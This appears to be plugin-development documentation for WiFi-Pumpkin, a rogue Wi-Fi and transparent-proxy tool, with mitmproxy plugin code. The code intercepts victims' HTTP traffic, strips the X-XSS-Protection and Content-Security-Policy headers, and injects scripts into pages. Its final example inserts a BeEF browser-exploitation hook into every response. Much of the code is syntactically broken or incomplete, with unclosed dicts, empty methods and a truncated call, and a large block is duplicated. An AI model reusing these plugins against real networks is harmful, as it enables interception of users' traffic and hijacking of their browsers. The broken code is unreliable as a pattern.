


my implements transparent proxies (mitmproxy) can use to intercept and manipulate HTTP traffic modifying requests and responses.


$ sudo apt-get update
$ sudo apt-get install -y python-pip libffi-dev
$ libssl-dev libxml2-dev libxslt1-dev zlib1g-dev
$ sudo apt-get install -y python-qt4
$ sudo apt-get install -y python-dev git
$ sudo apt-get install -y libpcap-dev
$ sudo pip install -r requirements.txt
$ sudo pip install mitmproxy==0.18.2

Transparent proxies(mitmproxy) that you can use to intercept and manipulate HTTP traffic modifying requests and responses, that allow to inject javascripts into the targets visited. You can easily implement a module to inject data into pages creating a python file in directory "plugins/" automatically will be loaded.

Plugins Example Dev

from mitmproxy.models import decoded # for decode content html
from plugins.extension.plugin import PluginTemplate

class Nameplugin(PluginTemplate):
   meta = {
       'Name'      : 'Nameplugin',
       'Version'   : '1.0',
       'Description' : 'Brief description of the new plugin',
       'Author'    : 'by dev'
   def __init__(self):
       for key,value in self.meta.items():
           self.__dict__[key] = value
       # if you want set arguments check refer wiki more info.
       self.ConfigParser = False # No require arguments

   def request(self, flow):
       print flow.__dict__
       print flow.request.__dict__
       print flow.request.headers.__dict__ # request headers
       host = flow.request.pretty_host # get domain on the fly requests
       versionH = flow.request.http_version # get http version

       # get redirect domains example
       # pretty_host takes the "Host" header of the request into account,
       if flow.request.pretty_host == "example.org":
           flow.request.host = "mitmproxy.org"

       # get all request Header example
       self.send_output.emit("\n[{}][HTTP REQUEST HEADERS]".format(self.Name))
       for name, valur in flow.request.headers.iteritems():
           self.send_output.emit('{}: {}'.format(name,valur))

       print flow.request.method # show method request
       # the model printer data
       self.send_output.emit('[NamePlugin]:: this is model for save data logging')

   def response(self, flow):
       print flow.__dict__
       print flow.response.__dict__
       print flow.response.headers.__dict__ #convert headers for python dict
       print flow.response.headers['Content-Type'] # get content type

       #every HTTP response before it is returned to the client
       with decoded(flow.response):
           print flow.response.content # content html
           flow.response.content.replace('</body>','<h1>injected</h1></body>') # replace content tag

       del flow.response.headers["X-XSS-Protection"] # remove protection Header

       flow.response.headers["newheader"] = "foo" # adds a new header
       #and the new header will be added to all responses passing through the proxy


First of all write the import plugin tamplate

from plugins.extension.plugin import PluginTemplate

the basic plugin example:

from plugins.extension.plugin import PluginTemplate

class Example(PluginTemplate):
    meta = {
        'Name'      : 'exampleplugin',
        'Version'   : '1.0',
        'Description' : 'description of plugin',
        'Author'    : 'by dev Name',

    def __init__(self):
        for key,value in self.meta.items():
            self.__dict__[key] = value
        self.ConfigParser = False # requeire args

    def request(self, flow): # get all request HTTP traffic

    def response(self, flow): # get all response HTTP traffic

Modify Packets

Simple fuctions that just adds a header to every request..

   def response(self, flow):
       flow.response.headers["newheader"] = "foo" # adds a new header

example from mitmproxy how to redirect connections (IP spoofing)

   def request(self, flow):
       if flow.client_conn.ssl_established:
           flow.request.scheme = "https"
           sni = flow.client_conn.connection.get_servername()
           port = 443
           flow.request.scheme = "http"
           sni = None
           port = 80

       host_header = flow.request.pretty_host
       m = parse_host_header.match(host_header)
       if m:
           host_header = m.group("host").strip("[]")
           if m.group("port"):
               port = int(m.group("port"))

       flow.request.host = sni or host_header
       flow.request.port = port

another example how to rewrite packet in real time

from mitmproxy.models import decoded # for decode content html
from plugins.extension.plugin import PluginTemplate

class Nameplugin(PluginTemplate):
   meta = {
       'Name'      : 'Nameplugin',
       'Version'   : '1.0',
       'Description' : 'Brief description of the new plugin',
       'Author'    : 'by dev'
   def __init__(self):
       for key,value in self.meta.items():
           self.__dict__[key] = value
       # if you want set arguments check refer wiki more info.
       self.ConfigParser = False # No require arguments

   def request(self, flow):
       print flow.__dict__
       print flow.request.__dict__
       print flow.request.headers.__dict__ # request headers
       host = flow.request.pretty_host # get domain on the fly requests
       versionH = flow.request.http_version # get http version

       # get redirect domains example
       # pretty_host takes the "Host" header of the request into account,
       if flow.request.pretty_host == "example.org":
           flow.request.host = "mitmproxy.org"

       # get all request Header example
       self.send_output.emit("\n[{}][HTTP REQUEST HEADERS]".format(self.Name))
       for name, valur in flow.request.headers.iteritems():
           self.send_output.emit('{}: {}'.format(name,valur))

       print flow.request.method # show method request
       # the model printer data
       self.send_output.emit('[NamePlugin]:: this is model for save data logging')

   def response(self, flow):
       print flow.__dict__
       print flow.response.__dict__
       print flow.response.headers.__dict__ #convert headers for python dict
       print flow.response.headers['Content-Type'] # get content type

       #every HTTP response before it is returned to the client
       with decoded(flow.response):
           print flow.response.content # content html
           flow.response.content.replace('</body>','<h1>injected</h1></body>') # replace content tag

       del flow.response.headers["X-XSS-Protection"] # remove protection Header

       flow.response.headers["newheader"] = "foo" # adds a new header
       #and the new header will be added to all responses passing through the proxy


if you want to save data(pumpkin-prxoy.log) in your plugin, just use self.send_output.emit('msg here')

   def request(self, flow):
       self.send_output.emit('[example]:: this is hellow WiFi-Pumpkin')

How to add argumments

Now, if you want to add argumments in proxy.ini, you need to add in directory "core/pumpkinProxy.ini" the key (exampleplugin and set_exampleplugin).

Example from WiFi-Pumpkin with Argummets

class beef(PluginTemplate):
    meta = {
        'Name'      : 'beef',
        'Version'   : '1.0',
        'Description' : 'this module proxy inject hook beef api url.[Hook URL]',
        'Author'    : 'Marcos Nesster'
    def __init__(self):
        for key,value in self.meta.items():
            self.__dict__[key] = value
        self.ConfigParser = True
        self.urlhook = self.config.get_setting('set_beef','hook')

    def request(self, flow):

    def response(self,flow):
        with decoded(flow.response):  # Remove content encoding (gzip, ...)
            html = BeautifulSoup(flow.response.content)
            # To Allow CORS
            if "Content-Security-Policy" in flow.response.headers:
                del flow.response.headers["Content-Security-Policy"]
            if html.body:
                script = html.new_tag(
                html.body.insert(0, script)
                flow.response.content = str(html)
                self.send_output.emit("[{}] Injected BeFF url hook...".format(self.Name))